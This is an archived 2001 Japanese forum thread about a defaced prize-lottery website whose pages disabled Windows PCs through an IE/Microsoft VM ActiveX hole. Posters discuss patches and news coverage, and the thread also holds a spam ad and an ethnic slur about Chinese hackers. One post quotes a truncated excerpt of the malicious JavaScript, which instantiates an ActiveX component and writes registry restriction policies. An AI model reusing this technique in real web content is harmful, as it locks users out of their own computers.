5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

プライスロト開くだけでOS破壊

1 :ロットコ:2001/08/20(月) 16:21
http://www.iosnet.ne.jp/~anti-virus/cgi-bin/treebbs.cgi?vew=7906

2 :名無しさん@お腹いっぱい。:2001/08/20(月) 16:24
がいしゅつ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=998241038&ls=50

3 :名無しさん@お腹いっぱい。:2001/08/20(月) 16:59
スレタイトルがこっちの方がマシだからこっちでやった方がいいかもね。

4 :名無しさん@お腹いっぱい。:2001/08/20(月) 17:10
おれも3に酸性だ

5 :ロットコ:2001/08/20(月) 17:20
既にプライスロトのHPは普通に戻ってますね

食らったWIN98からなんとかソース抜きました

で、いろいろテストした結果IE5.5SP2では感染しません
SP1では即感染です

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f(){
try
{
file://ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
中略
try
{
if (document.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun", 00000001, "REG_DWORD");
以下、100行ほど続きます

6 :名無しさん@お腹いっぱい。:2001/08/20(月) 17:47
悪恥部X切ってれば問題なっしんぐ?

7 :名無しさん@Emacs:2001/08/20(月) 17:52
HTML メールに貼り付けてもやっぱり同じように動作するんだろうなぁ。
キケンすぎ。

8 :名無しさん@お腹いっぱい。:2001/08/20(月) 17:59
IE5.01も5.5も、
SP2だったらセキュリティーホールの対策がされているらしい。

9 :名無しさん@お腹いっぱい。:2001/08/20(月) 18:49
age

10 :終了:2001/08/20(月) 20:29
sage

11 :名無しさん@お腹いっぱい。:2001/08/21(火) 01:37
>>8
標準インストールでは対策されない。
カスタムインストールでMS VMの更新をチェックしないとだめ。
jviewコマンド実行してバージョンをチェックしる。

12 :名無しさん@お腹いっぱい。:2001/08/21(火) 02:31
つーかこの脆弱性って、一体いつの話だよ。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-075
>更新日 : 2001/1/17

ビルド3300シリーズ?今の最新は3800台ですが何か?
いくら懸賞サイトにコードが埋めこまれてたとはいえ、
何でいまさらになってこんな大騒ぎになるのか分からん。

13 :名無しさん@お腹いっぱい。:2001/08/21(火) 02:51
普段からこの手の問題を気にしている者と一般人を一緒に考えるな。
世の中マニアだけではない。

14 :名無しさん@お腹いっぱい。:2001/08/21(火) 02:59
Windows Updateを気にしている者は、マニアですか?

15 :12:2001/08/21(火) 03:09
>>14
書こうとした事を先に書かれた…
>>12のURL自体はマイナーかもしれないけど、
Microsoft VMのアップデートってWindows Updateではよく目にする項目だと思うけど。

16 : :2001/08/21(火) 03:22
買ったままのWin98+IE4素とかそのまま使ってる人は多いよ。

17 :名無しさん@お腹いっぱい。:2001/08/21(火) 03:36
ここに書いてあるのは特定のWebサイトのJavaスクリプトで
PCが使用不能になる問題のパッチの事ですか?
http://www.zdnet.co.jp/news/0108/20/javascript.html

18 :名無しさん@お腹いっぱい。:2001/08/21(火) 03:41
>>16
まあ、そうなんだろうけどね。

>>17
スレを読めば分かるでしょ。

19 :名無しさん@お腹いっぱい。:2001/08/21(火) 04:56
でも、新聞社によって、担当者の力量が分かりますなぁ。

毎日/悪意を持つJavaスクリプト、HP閲覧でPC使用不能に IPA警告
http://www.mainichi.co.jp/digital/network/today/1.html

読売/海保システムがウイルス感染、新種の可能性
http://www.yomiuri.co.jp/04/20010820i213.htm

20 :名無しさん@お腹いっぱい。:2001/08/21(火) 08:50
Windows Updateで、Microsoft VMのアップデート、でませんでしたけど。
何でなのかは分からないけど。
IPAからリンク辿ってパッチ当てました。
私にゃマイクロソフトのホームページからは辿りつけん…。

21 :age:2001/08/21(火) 08:58
30個の共有宣伝掲示板にカキコするだけで
2,559個の掲示板で宣伝したことに!!
効率よく宣伝しちゃいましょう。
その他共有チャットも10台設置。メル友を
ジャンジャン作りましょう。

http://home9.highway.ne.jp/cym10262/

22 :えり:2001/08/21(火) 09:02
1ちゃんねるでも今朝のニュースでやってたよ。
http://www.nhk.or.jp/news/2001/08/21/grri840000006bcb.html#

23 :名無しさん@お腹いっぱい。:2001/08/21(火) 09:03
IE5.5SP2出てるね、いつのまにか。知らなかったよ。

24 :名無しさん@お腹いっぱい。:2001/08/21(火) 09:05
↑結構まともじゃん

25 :名無しさん@お腹いっぱい。:2001/08/21(火) 09:15
>19
読売、誤報ですなあ。

26 :名無しさん@お腹いっぱい。:2001/08/21(火) 09:25
>>19の読売の記事の下に、
安倍&えなりさん…ZipZap
っていうリンクがあるけど、
なんでえなりだけ「さん」付けになっているんだろう?

27 :名無しさん@お腹いっぱい。:2001/08/21(火) 09:44
やっぱし貼ったのは中国ハッカーか?
日本からODA貰ってるくせに、国策でハッカーをのさばらせるイヤな国だ。

28 :・・・:2001/08/21(火) 20:19
IEじゃないブラウザを使えばイイの?

29 :名無しさん@Emacs:2001/08/21(火) 21:24
プライスロトがされたのはHTMLの改竄だけなの?
あそこの利用者の個人情報が漏れたりとかしてない?

30 : :2001/08/22(水) 07:53
パクりかっこわるい
http://slashdot.jp/article.pl?sid=01/08/21/0428210&mode=thread&threshold=

31 :ななし:2001/08/22(水) 10:59
プライスロト開いてもだいじょぶだったけど・・・。

32 :名無しさん@お腹いっぱい。:2001/08/22(水) 11:08
>>26
新聞には、敬称の繰り返しを避けるために
「鈴木、佐藤、渡辺さん」なんつう用法があるので
なっちにも「さん」をつけてるつもりだと思うべさ。
でも、確かに違和感を感じます。

33 :名無しさん@お腹いっぱい。:2001/08/22(水) 11:10
>>31 とっくのむかしに直ってるよ、どヴォケ!(藁

34 :名無しさん@お腹いっぱい。:2001/08/22(水) 18:10
>>7
無知すぎ

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)